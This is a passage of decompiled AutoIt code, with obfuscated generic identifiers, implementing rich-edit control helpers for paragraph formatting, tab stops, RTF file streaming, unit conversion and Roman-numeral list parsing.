- IF $Local001C = 0 THEN RETURN SETERROR(0x0068 , 0 ,FALSE )
- $Local00DE =INT($Local001C / 4 )
- $Local001C =STRINGINSTR($Var0556 ,";" &$ArgOpt04&";" )
- IF $Local001C = 0 THEN RETURN SETERROR(0x0069 , 0 ,FALSE )
- LOCAL $Local00DF =INT($Local001C / 4 )
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
- DLLSTRUCTSETDATA($Local00B4 ,"cbSize" ,DLLSTRUCTGETSIZE($Local00B4 ))
- DLLSTRUCTSETDATA($Local00B4 ,"wShadingWeight",$ArgOpt01)
- $Local001C =$Local00C0 +BITSHIFT($Local00DE ,- 4 )+BITSHIFT($Local00DF ,- 8 )
- DLLSTRUCTSETDATA($Local00B4 ,"wShadingStyle",$Local001C )
- DLLSTRUCTSETDATA($Local00B4 ,"dwMask" ,$Var03DA )
- LOCAL $Local0055 =Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )
- IF NOT $Local0055 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn0162($Arg00,$ArgOpt01=DEFAULT ,$ArgOpt02=DEFAULT ,$ArgOpt03=DEFAULT )
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT ($ArgOpt02=DEFAULT OR Fn0176($ArgOpt02,">=0" ))THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
- IF NOT ($ArgOpt03=DEFAULT OR Fn0176($ArgOpt03,">=0" ))THEN RETURN SETERROR(0x0068 , 0 ,FALSE )
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
- DLLSTRUCTSETDATA($Local00B4 ,"cbSize" ,DLLSTRUCTGETSIZE($Local00B4 ))
- LOCAL $Local00A1 = 0
- IF $ArgOpt01<>DEFAULT THEN
- $ArgOpt01=STRINGSTRIPWS($ArgOpt01, 8 )
- LOCAL $Local00E0 =STRINGINSTR($ArgOpt01,"line" , 2 )
- IF $Local00E0 <> 0 THEN
- $ArgOpt01=STRINGLEFT($ArgOpt01,$Local00E0 - 1 )
- ENDIF
- IF NOT Fn0176($ArgOpt01,">=0" )THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
- LOCAL $Local00C8 ,$Var0577 = 0
- IF $Local00E0 <> 0 THEN
- SWITCH $ArgOpt01
- CASE 1
- $Local00C8 = 0
- CASE 1.5
- $Local00C8 = 1
- CASE 2
- $Local00C8 = 2
- CASE ELSE
- IF $ArgOpt01< 1 THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
- $Local00C8 = 5
- $Var0577 =$ArgOpt01*0x0014
- ENDSWITCH
- ELSE
- $Local00C8 = 4
- $Var0577 =$ArgOpt01*$Var04B9
- ENDIF
- $Local00A1 =$Var03AE
- DLLSTRUCTSETDATA($Local00B4 ,"bLineSpacingRule",$Local00C8 )
- IF $Var0577 <> 0 THEN DLLSTRUCTSETDATA($Local00B4 ,0x000D ,$Var0577 )
- ENDIF
- IF $ArgOpt02<>DEFAULT THEN
- $Local00A1 =BITOR($Local00A1 ,$Var03A0 )
- DLLSTRUCTSETDATA($Local00B4 ,"dySpaceBefore",$ArgOpt02*$Var04B9 )
- ENDIF
- IF $ArgOpt03<>DEFAULT THEN
- $Local00A1 =BITOR($Local00A1 ,$Var03B0 )
- DLLSTRUCTSETDATA($Local00B4 ,"dySpaceAfter",$ArgOpt03*$Var04B9 )
- ENDIF
- IF $Local00A1 <> 0 THEN
- DLLSTRUCTSETDATA($Local00B4 ,"dwMask" ,$Local00A1 )
- RETURN Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )<> 0
- ELSE
- RETURN TRUE
- ENDIF
- ENDFUNC
- Func Fn0163($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
- DLLSTRUCTSETDATA($Local00B4 ,"cbSize" ,DLLSTRUCTGETSIZE($Local00B4 ))
- IF $Arg01="" THEN
- DLLSTRUCTSETDATA($Local00B4 ,"cTabCount" , 0 )
- ELSE
- LOCAL $Local00E1 =STRINGSPLIT($Arg01,";" )
- IF $Local00E1 [ 0 ]>$Var038E THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
- LOCAL $Var0578 ,$Local00EB ,$Local00DD ,$Local001C ,$Local00E0
- FOR $Local00C1 = 1 TO $Local00E1 [ 0 ]
- $Var0578 =STRINGSPLIT($Local00E1 [$Local00C1 ],"")
- $Local00EB = 1
- WHILE $Local00EB <=$Var0578 [ 0 ]AND STRINGINSTR("01234567890.",$Var0578 [$Local00EB ])<> 0
- $Local00EB += 1
- WEND
- IF $Local00EB = 1 THEN RETURN SETERROR(0x03FD ,$Local00C1 ,FALSE )
- $Local00DD =STRINGLEFT($Local00E1 [$Local00C1 ],$Local00EB - 1 )
- IF NOT Fn0176($Local00DD ,">=0" )THEN RETURN SETERROR(0x03FD ,$Local00C1 ,FALSE )
- $Local001C =$Local00DD *$Var04B9
- IF $Local00EB <=$Var0578 [ 0 ]THEN
- $Local00E0 =STRINGINSTR("lcrdb" ,$Var0578 [$Local00EB ])
- IF $Local00E0 = 0 THEN RETURN SETERROR(0x03FE ,$Local00C1 ,FALSE )
- $Local001C =BITOR($Local001C ,BITSHIFT($Local00E0 - 1 ,-0x0018 ))
- ENDIF
- $Local00EB += 1
- IF $Local00EB <=$Var0578 [ 0 ]THEN
- $Local00E0 =STRINGINSTR(" .-_t=" ,$Var0578 [$Local00EB ])
- IF $Local00E0 = 0 THEN RETURN SETERROR(0x03FF ,$Local00C1 ,FALSE )
- $Local001C =BITOR($Local001C ,BITSHIFT($Local00E0 - 1 ,-0x001C ))
- ENDIF
- DLLSTRUCTSETDATA($Local00B4 ,"rgxTabs" ,$Local001C ,$Local00C1 )
- NEXT
- DLLSTRUCTSETDATA($Local00B4 ,"cTabCount" ,$Local00E1 [ 0 ])
- ENDIF
- DLLSTRUCTSETDATA($Local00B4 ,"dwMask" ,$Var03B6 )
- RETURN Fn0006($Arg00,$Var026C , 0 ,$Local00B4 , 0 ,"wparam" ,"struct*" )<> 0
- ENDFUNC
- Func Fn0164($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT ISSTRING($Arg01)THEN SETERROR(0x0066 , 0 ,FALSE )
- IF $Arg01="" THEN
- Fn0006($Arg00,$Var0579 )
- ELSE
- Fn0006($Arg00,$Var0579 ,ASC($Arg01))
- ENDIF
- RETURN TRUE
- ENDFUNC
- Func Fn0165($Arg00,$ArgOpt01=TRUE )
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT ISBOOL($ArgOpt01)THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
- LOCAL $Local0055 =Fn0006($Arg00,$Var057A ,$ArgOpt01)
- IF $Local0055 = 0 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn0166($Arg00,$Arg01,$Arg02)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT Fn0176($Arg01,">=0" )THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
- IF NOT Fn0176($Arg02,">=0" )THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
- LOCAL $Local0030 =DLLSTRUCTCREATE($Var010E )
- DLLSTRUCTSETDATA($Local0030 , 1 ,$Arg01)
- DLLSTRUCTSETDATA($Local0030 , 2 ,$Arg02)
- RETURN Fn0006($Arg00,$Var0270 , 0 ,$Local0030 , 0 ,"wparam" ,"struct*" )<> 0
- ENDFUNC
- Func Fn0167($Arg00,$Arg01,$Arg02,$ArgOpt03=FALSE )
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT Fn0176($Arg01,">=0,-1" )THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
- IF NOT Fn0176($Arg02,">=0,-1" )THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
- IF NOT ISBOOL($ArgOpt03)THEN RETURN SETERROR(0x0068 , 0 ,FALSE )
- Fn0006($Arg00,$Var0543 ,$Arg01,$Arg02)
- IF $ArgOpt03 THEN Fn0006($Arg00,$Var0246 ,$ArgOpt03)
- Fn00AF($Arg00)
- RETURN TRUE
- ENDFUNC
- Func Fn0168($Arg00)
- SWITCH STRINGLOWER($Arg00)
- CASE "in"
- $Var04B9 =0x05A0
- CASE "cm"
- $Var04B9 =0x0237
- CASE "mm"
- $Var04B9 = 56.7
- CASE "pt"
- $Var04B9 =0x0014
- CASE "tw"
- $Var04B9 = 1
- CASE ELSE
- RETURN SETERROR( 1 , 0 ,FALSE )
- ENDSWITCH
- RETURN TRUE
- ENDFUNC
- Func Fn0169($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- LOCAL $Local0096 =DLLSTRUCTCREATE($Var0534 )
- DLLSTRUCTSETDATA($Local0096 , 1 ,$Var02DE )
- DLLSTRUCTSETDATA($Local0096 , 2 ,$Var0300 )
- LOCAL $Local0055
- IF STRINGLEFT($Arg01, 5 )<>"{\rtf" AND STRINGLEFT($Arg01, 5 )<>"{urtf" THEN
- DLLSTRUCTSETDATA($Local0096 , 2 ,$Var0302 )
- $Local0055 =Fn0006($Arg00,$Var0274 ,$Local0096 ,$Arg01, 0 ,"struct*" ,"wstr" )
- ELSE
- $Local0055 =Fn0006($Arg00,$Var0274 ,$Local0096 ,$Arg01, 0 ,"struct*" ,"STR" )
- ENDIF
- IF NOT $Local0055 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn016A($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT Fn0176($Arg01,">=0" )THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
- RETURN Fn0006($Arg00,$Var027A ,$Arg01)<> 0 OR $Arg01= 0
- ENDFUNC
- Func Fn016B($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- LOCAL $Local00E2 =DLLSTRUCTCREATE($Var0519 )
- DLLSTRUCTSETDATA($Local00E2 ,"pfnCallback",DLLCALLBACKGETPTR($Var04BE ))
- LOCAL $Local00E3 =FILEOPEN($Arg01, 0 )
- IF $Local00E3 =- 1 THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
- LOCAL $Local00E4 =FILEREAD($Local00E3 , 5 )
- FILECLOsE($Local00E3 )
- $Local00E3 =FILEOPEN($Arg01, 0 )
- DLLSTRUCTSETDATA($Local00E2 ,"dwCookie" ,$Local00E3 )
- LOCAL $Local009F =Fn0102($Local00E4 =="{\rtf" OR $Local00E4 =="{urtf" ,$Var03FC ,$Var03FA )
- $Local009F =BITOR($Local009F ,$Var0408 )
- IF NOT Fn0147($Arg00)THEN
- Fn0169($Arg00,"")
- ENDIF
- LOCAL $Local00E5 =Fn0006($Arg00,$Var0286 ,$Local009F ,$Local00E2 , 0 ,"wparam" ,"struct*" )
- FILECLOsE($Local00E3 )
- LOCAL $Local0053 =DLLSTRUCTGETDATA($Local00E2 ,"dwError" )
- IF $Local0053 <> 1 THEN SETERROR(0x02BC ,$Local0053 ,FALSE )
- IF $Local00E5 = 0 THEN
- IF FILEGETSIZE($Arg01)= 0 THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
- RETURN SETERROR(0x02BC ,$Local0053 ,FALSE )
- ENDIF
- RETURN TRUE
- ENDFUNC
- Func Fn016C($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- LOCAL $Local00E2 =DLLSTRUCTCREATE($Var0519 )
- DLLSTRUCTSETDATA($Local00E2 ,"pfnCallback",DLLCALLBACKGETPTR($Var04C1 ))
- $Var04CA =$Arg01
- LOCAL $Local00DD =STRINGLEFT($Arg01, 5 )
- LOCAL $Local009F =Fn0102($Local00DD =="{\rtf" OR $Local00DD =="{urtf" ,$Var03FC ,$Var03FA )
- $Local009F =BITOR($Local009F ,$Var0408 )
- IF NOT Fn0147($Arg00)THEN
- Fn0169($Arg00,"")
- ENDIF
- Fn0006($Arg00,$Var0286 ,$Local009F ,$Local00E2 , 0 ,"wparam" ,"struct*" )
- LOCAL $Local0053 =DLLSTRUCTGETDATA($Local00E2 ,"dwError" )
- IF $Local0053 <> 1 THEN RETURN SETERROR(0x02BC ,$Local0053 ,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn016D($Arg00,$Arg01,$ArgOpt02=TRUE ,$ArgOpt03=0,$ArgOpt04=0)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- LOCAL $Local009F
- IF STRINGRIGHT($Arg01, 4 )=".rtf" THEN
- $Local009F =Fn0102($ArgOpt02,$Var03FC ,$Var03FE )
- ELSE
- $Local009F =Fn0102($ArgOpt02,$Var0400 ,$Var03FA )
- IF BITAND($ArgOpt03,$Var0406 )THEN RETURN SETERROR(0x0411 , 0 ,FALSE )
- ENDIF
- IF BITAND($ArgOpt03,BITNOT(BITOR($Var0406 ,$Var0402 )))THEN RETURN SETERROR(0x0412 , 0 ,FALSE )
- IF BITAND($ArgOpt03,$Var0402 )THEN
- IF NOT BITAND($Local009F ,$Var03FA )THEN RETURN SETERROR(0x0413 , 0 ,FALSE )
- ENDIF
- IF Fn0147($Arg00)THEN $Local009F =BITOR($Local009F ,$Var0408 )
- $Local009F =BITOR($Local009F ,$ArgOpt03)
- IF $ArgOpt04<> 0 THEN
- $Local009F =BITOR($Local009F ,$Var0404 ,BITSHIFT($ArgOpt04,-0x0010 ))
- ENDIF
- LOCAL $Local00E2 =DLLSTRUCTCREATE($Var0519 )
- DLLSTRUCTSETDATA($Local00E2 ,"pfnCallback",DLLCALLBACKGETPTR($Var04C4 ))
- LOCAL $Local00E3 =FILEOPEN($Arg01, 2 )
- IF $Local00E3 - 1 THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
- DLLSTRUCTSETDATA($Local00E2 ,"dwCookie" ,$Local00E3 )
- Fn0006($Arg00,$Var0288 ,$Local009F ,$Local00E2 , 0 ,"wparam" ,"struct*" )
- FILECLOsE($Local00E3 )
- LOCAL $Local0053 =DLLSTRUCTGETDATA($Local00E2 ,"dwError" )
- IF $Local0053 <> 0 THEN SETERROR(0x02BC ,$Local0053 ,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn016E($Arg00,$ArgOpt01=TRUE ,$ArgOpt02=TRUE ,$ArgOpt03=0,$ArgOpt04=0)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
- LOCAL $Local009F
- IF $ArgOpt01 THEN
- $Local009F =Fn0102($ArgOpt02,$Var03FC ,$Var03FE )
- ELSE
- $Local009F =Fn0102($ArgOpt02,$Var0400 ,$Var03FA )
- IF BITAND($ArgOpt03,$Var0406 )THEN RETURN SETERROR(0x0411 , 0 ,"")
- ENDIF
- IF BITAND($ArgOpt03,BITNOT(BITOR($Var0406 ,$Var0402 )))THEN RETURN SETERROR(0x0412 , 0 ,"")
- IF BITAND($ArgOpt03,$Var0402 )THEN
- IF NOT BITAND($Local009F ,$Var03FA )THEN RETURN SETERROR(0x0413 , 0 ,"")
- ENDIF
- IF Fn0147($Arg00)THEN $Local009F =BITOR($Local009F ,$Var0408 )
- $Local009F =BITOR($Local009F ,$ArgOpt03)
- IF $ArgOpt04<> 0 THEN
- $Local009F =BITOR($Local009F ,$Var0404 ,BITSHIFT($ArgOpt04,-0x0010 ))
- ENDIF
- LOCAL $Local00E2 =DLLSTRUCTCREATE($Var0519 )
- DLLSTRUCTSETDATA($Local00E2 ,"pfnCallback",DLLCALLBACKGETPTR($Var04C7 ))
- $Var04CA =""
- Fn0006($Arg00,$Var0288 ,$Local009F ,$Local00E2 , 0 ,"wparam" ,"struct*" )
- LOCAL $Local0053 =DLLSTRUCTGETDATA($Local00E2 ,"dwError" )
- IF $Local0053 <> 0 THEN SETERROR(0x02BC ,$Local0053 ,"")
- RETURN $Var04CA
- ENDFUNC
- Func Fn016F($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- RETURN Fn0006($Arg00,$Var057B , 0 , 0 )<> 0
- ENDFUNC
- Func Fn0170()
- $Var04B7 =DLLCALL("kernel32.dll","ptr" ,"LoadLibraryW","wstr" ,"MSFTEDIT.DLL")
- IF $Var04B7 [ 0 ]<> 0 THEN
- $Var04B6 ="RichEdit50W"
- $Var04B8 = 4.1
- ELSE
- $Var04B7 =DLLCALL("kernel32.dll","ptr" ,"LoadLibraryW","wstr" ,"RICHED20.DLL")
- $Var04B8 =FILEGETVERSION( @SystemDir &"\riched20.dll","ProductVersion")
- SWITCH $Var04B8
- CASE 3.0
- $Var04B6 ="RichEdit20W"
- CASE 5.0
- $Var04B6 ="RichEdit50W"
- CASE 6.0
- $Var04B6 ="RichEdit60W"
- ENDSWITCH
- ENDIF
- $Var04BC =Fn00FB("Rich Text Format")
- $Var04BD =Fn00FB("Rich Text Format with Objects")
- ENDFUNC
- Func Fn0171($Arg00,$Arg01,$Arg02,$Arg03)
- LOCAL $Local00E6 =DLLSTRUCTCREATE("long" ,$Arg03)
- DLLSTRUCTSETDATA($Local00E6 , 1 , 0 )
- LOCAL $Local00E7 =DLLSTRUCTCREATE("char[" &$Arg02&"]" ,$Arg01)
- LOCAL $Local00E4 =FILEREAD($Arg00,$Arg02- 1 )
- IF @ERROR<> 0 THEN RETURN 1
- DLLSTRUCTSETDATA($Local00E7 , 1 ,$Local00E4 )
- DLLSTRUCTSETDATA($Local00E6 , 1 ,STRINGLEN($Local00E4 ))
- RETURN 0
- ENDFUNC
- Func Fn0172($Arg00,$Arg01,$Arg02,$Arg03)
- #forceref $Arg00
- LOCAL $Local00E6 =DLLSTRUCTCREATE("long" ,$Arg03)
- DLLSTRUCTSETDATA($Local00E6 , 1 , 0 )
- LOCAL $Local00E8 =DLLSTRUCTCREATE("char[" &$Arg02&"]" ,$Arg01)
- LOCAL $Local00E9 =STRINGLEFT($Var04CA ,$Arg02- 1 )
- IF $Local00E9 ="" THEN RETURN 1
- DLLSTRUCTSETDATA($Local00E8 , 1 ,$Local00E9 )
- LOCAL $Local009B =STRINGLEN($Local00E9 )
- DLLSTRUCTSETDATA($Local00E6 , 1 ,$Local009B )
- $Var04CA =STRINGMID($Var04CA ,$Local009B + 1 )
- RETURN 0
- ENDFUNC
- Func Fn0173($Arg00,$Arg01,$Arg02,$Arg03)
- LOCAL $Local00E6 =DLLSTRUCTCREATE("long" ,$Arg03)
- DLLSTRUCTSETDATA($Local00E6 , 1 , 0 )
- LOCAL $Local00E7 =DLLSTRUCTCREATE("char[" &$Arg02&"]" ,$Arg01)
- LOCAL $Local00DD =DLLSTRUCTGETDATA($Local00E7 , 1 )
- FILEWRITE($Arg00,$Local00DD )
- DLLSTRUCTSETDATA($Local00E6 , 1 ,STRINGLEN($Local00DD ))
- RETURN 0
- ENDFUNC
- Func Fn0174($Arg00,$Arg01,$Arg02,$Arg03)
- $Arg00=$Arg00
- LOCAL $Local00E6 =DLLSTRUCTCREATE("long" ,$Arg03)
- DLLSTRUCTSETDATA($Local00E6 , 1 , 0 )
- LOCAL $Local00E7 =DLLSTRUCTCREATE("char[" &$Arg02&"]" ,$Arg01)
- LOCAL $Local00DD =DLLSTRUCTGETDATA($Local00E7 , 1 )
- $Var04CA &=$Local00DD
- RETURN 0
- ENDFUNC
- Func Fn0175($Arg00)
- LOCAL $Local0041
- SWITCH $Var04B9
- CASE 0x05A0 ,0x0237
- $Local0041 =STRINGFORMAT("%.2f" ,$Arg00/$Var04B9 )
- IF $Local0041 ="-0.00" THEN $Local0041 ="0.00"
- CASE 56.7 ,0x0048
- $Local0041 =STRINGFORMAT("%.1f" ,$Arg00/$Var04B9 )
- IF $Local0041 ="-0.0" THEN $Local0041 ="0.0"
- CASE ELSE
- $Local0041 =$Arg00
- ENDSWITCH
- RETURN $Local0041
- ENDFUNC
- Func Fn0176($Arg00,$ArgOpt01="")
- IF NOT (ISNUMBER($Arg00)OR STRINGISINT($Arg00)OR STRINGISFLOAT($Arg00))THEN RETURN FALSE
- SWITCH $ArgOpt01
- CASE ">0"
- IF $Arg00<= 0 THEN RETURN FALSE
- CASE ">=0"
- IF $Arg00< 0 THEN RETURN FALSE
- CASE ">0,-1"
- IF NOT ($Arg00> 0 OR $Arg00=- 1 )THEN RETURN FALSE
- CASE ">=0,-1"
- IF NOT ($Arg00>= 0 OR $Arg00=- 1 )THEN RETURN FALSE
- ENDSWITCH
- RETURN TRUE
- ENDFUNC
- Func Fn0177($Arg00,$Arg01,$Arg02)
- IF NOT Fn0147($Arg00)THEN
- RETURN "c"
- ELSEIF BITAND($Arg01,$Arg02)=$Arg02 THEN
- RETURN "a"
- ELSE
- RETURN "f"
- ENDIF
- ENDFUNC
- Func Fn0178($Arg00,$Arg01,BYREF $ArgRef02,BYREF $ArgRef03,BYREF $ArgRef04,BYREF $ArgRef05,BYREF $ArgRef06)
- LOCAL CONST $Var057C ="mdclxviMDCLXVI",$Var057D = 0 ,$Var057E =0x0100 ,$Var057F =0x0200 ,$Var0580 =0x0300
- IF $Arg00="" THEN
- $ArgRef03= 0
- $ArgRef02=$Var039C
- ELSE
- LOCAL $Local00DD =STRINGSTRIPWS($Arg00, 2 )
- $ArgRef06=STRINGLEN($Arg00)-STRINGLEN($Local00DD )
- $Arg00=$Local00DD
- $ArgRef02=$Var03B2
- IF $Arg00="." THEN
- $ArgRef03=$Var03B8
- $ArgRef02=BITOR($ArgRef02,$Var039C )
- ELSEIF $Arg00="=" THEN
- $ArgRef05=0x0400
- $ArgRef02=BITOR($ArgRef02,$Var03A2 )
- ELSE
- SWITCH STRINGRIGHT($Arg00, 1 )
- CASE ")"
- IF STRINGLEFT($Arg00, 1 )="(" THEN
- $ArgRef05=$Var057E
- $Arg00=STRINGTRIMLEFT($Arg00, 1 )
- ELSE
- $ArgRef05=$Var057D
- ENDIF
- CASE "."
- $ArgRef05=$Var057F
- CASE ELSE
- $ArgRef05=$Var0580
- ENDSWITCH
- $ArgRef02=BITOR($ArgRef02,$Var03A2 )
- IF $ArgRef05<>0x0300 THEN $Arg00=STRINGTRIMRIGHT($Arg00, 1 )
- IF STRINGISDIGIT($Arg00)THEN
- $ArgRef04=NUMBER($Arg00)
- $ArgRef03= 2
- $ArgRef02=BITOR($ArgRef02,$Var03A4 ,$Var039C )
- ELSE
- LOCAL $Local00EA =TRUE
- FOR $Local00EB = 1 TO STRINGLEN($Arg00)
- IF NOT STRINGINSTR($Var057C ,STRINGMID($Arg00,$Local00EB , 1 ))THEN
- $Local00EA =FALSE
- EXITLOOP
- ENDIF
- NEXT
- LOCAL $Var0581
- IF $Local00EA THEN
- $Var0581 =$Arg01
- ELSE
- $Var0581 =FALSE
- ENDIF
- SWITCH TRUE
- CASE $Var0581
- $ArgRef04=Fn0179($Arg00)
- IF $ArgRef04=- 1 THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
- $ArgRef03=Fn0102(STRINGISLOWER($Arg00), 5 , 6 )
- $ArgRef02=BITOR($ArgRef02,$Var03A4 ,$Var039C )
- CASE STRINGISALPHA($Arg00)
- IF STRINGISLOWER($Arg00)THEN
- $ArgRef03= 3
- ELSE
- $ArgRef03= 4
- $Arg00=STRINGLOWER($Arg00)
- ENDIF
- $ArgRef04= 0
- LOCAL $Local001C
- FOR $Local00E0 = 1 TO STRINGLEN($Arg00)
- $Local001C =ASC(STRINGMID($Arg00,$Local00EB ))
- IF $Local001C >=ASC("a" )AND $Local001C <=ASC("z" )THEN
- $ArgRef04=$ArgRef04*0x001A +($Local001C -ASC("a" )+ 1 )
- ENDIF
- NEXT
- $ArgRef02=BITOR($ArgRef02,$Var03A4 ,$Var039C )
- CASE ELSE
- RETURN SETERROR(0x0066 , 0 ,FALSE )
- ENDSWITCH
- ENDIF
- ENDIF
- ENDIF
- RETURN TRUE
- ENDFUNC
- Func Fn0179($Arg00)
- LOCAL ENUM $Var0582 ,$Var0583 ,$Var0584 ,$Var0585 ,$Var0586 ,$Var0587
- LOCAL CONST $Local00C2 [ 3 ][ 6 ]=[["cm" ,"d" ,"cd" ,"c" ,0x0064 ,"m" ],["xc" ,"l" ,"xl" ,"x" , 10 ,"mdc" ],["ix" ,"v" ,"iv" ,"i" , 1 ,"mdclx" ]]
- $Arg00=STRINGLOWER($Arg00)
- LOCAL $Local00EB = 1
- WHILE STRINGMID($Arg00,$Local00EB , 1 )="m"
- $Local00EB += 1
- WEND
- LOCAL $Var0588 ,$Var0589 ,$Local0055 =($Local00EB - 1 )*0x03E8
- FOR $Var0558 = 0 TO 2
- $Var0588 = 0
- IF STRINGMID($Arg00,$Local00EB , 2 )=$Local00C2 [$Var0558 ][$Var0582 ]THEN
- $Var0588 = 9
- $Local00EB += 2
- ELSEIF STRINGMID($Arg00,$Local00EB , 1 )=$Local00C2 [$Var0558 ][$Var0583 ]THEN
- $Var0588 = 5
- $Local00EB += 1
- ELSEIF STRINGMID($Arg00,$Local00EB , 2 )=$Local00C2 [$Var0558 ][$Var0584 ]THEN
- $Var0588 = 4
- $Local00EB += 2
- ELSEIF STRINGINSTR($Local00C2 [$Var0558 ][$Var0587 ],STRINGMID($Arg00,$Local00EB , 1 ))THEN
- RETURN - 1
- ENDIF
- IF $Var0588 = 0 OR $Var0588 = 5 THEN
- $Var0589 = 0
- WHILE STRINGMID($Arg00,$Local00EB , 1 )=$Local00C2 [$Var0558 ][$Var0585 ]
- $Var0589 += 1
- IF $Var0589 > 3 THEN RETURN 0
- $Local00EB += 1
- WEND
- $Var0588 +=$Var0589
- ENDIF
- $Local0055 +=$Var0588 *$Local00C2 [$Var0558 ][$Var0586 ]
- NEXT
- IF $Local00EB <=STRINGLEN($Arg00)THEN RETURN - 1
- RETURN $Local0055
- ENDFUNC
- Func Fn017A($Arg00,$Arg01)
- LOCAL $Local00EC =Fn0147($Arg00)
- LOCAL $Var058A
- IF $Local00EC THEN
- $Var058A =Fn013C($Arg00)
- Fn0167($Arg00,$Var058A [ 0 ],$Var058A [ 0 ]+ 1 ,TRUE )
- ENDIF
- LOCAL $Local0055 =Fn0006($Arg00,$Var0218 ,$Var0380 ,$Arg01, 0 ,"wparam" ,"struct*" )
- IF $Local00EC THEN Fn0167($Arg00,$Var058A [ 0 ],$Var058A [ 1 ])
- RETURN $Local0055
- ENDFUNC
- Func Fn017B($Arg00,$Arg01)
- LOCAL $Local00EC =Fn0147($Arg00)
- LOCAL $Local00ED = 0
- IF NOT $Local00EC THEN
- LOCAL $Local00D5 =Fn013B($Arg00)
- $Local00ED =$Local00D5 [ 0 ]
- LOCAL $Local001C =Fn0128($Arg00)
- Fn0167($Arg00,$Local001C ,$Local001C + 1 ,TRUE )
- ENDIF
- Fn0006($Arg00,$Var022A , 0 ,$Arg01, 0 ,"wparam" ,"struct*" )
- IF NOT $Local00EC THEN Fn0167($Arg00,$Local00ED ,$Local00ED )
- RETURN TRUE
- ENDFUNC
- Func Fn017C($Arg00)
- IF NOT ISHWND($Arg00)THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT $Var04CF THEN
- $Var04CE =DLLSTRUCTCREATE("ptr[20]" )
- DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04D2 ), 1 )
- DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04D5 ), 2 )
- DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04D8 ), 3 )
- DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04DB ), 4 )
- DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04DE ), 5 )
- DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04E1 ), 6 )
- DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04E4 ), 7 )
- DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04E7 ), 8 )
- DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04EA ), 9 )
- DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04ED ), 10 )
- DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04F0 ),0x000B )
- DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04F3 ),0x000C )
- DLLSTRUCTSETDATA($Var04CE , 1 ,DLLCALLBACKGETPTR($Var04F6 ),0x000D )
- DLLSTRUCTSETDATA($Var04CC , 1 ,DLLSTRUCTGETPTR($Var04CE ))
- DLLSTRUCTSETDATA($Var04CC , 2 , 1 )
- $Var04CF =DLLSTRUCTGETPTR($Var04CC )
- ENDIF
- LOCAL CONST $Var0266 =0x0400 +0x0046
- IF Fn0006($Arg00,$Var0266 , 0 ,$Var04CF )= 0 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
- RETURN TRUE
- ENDFUNC
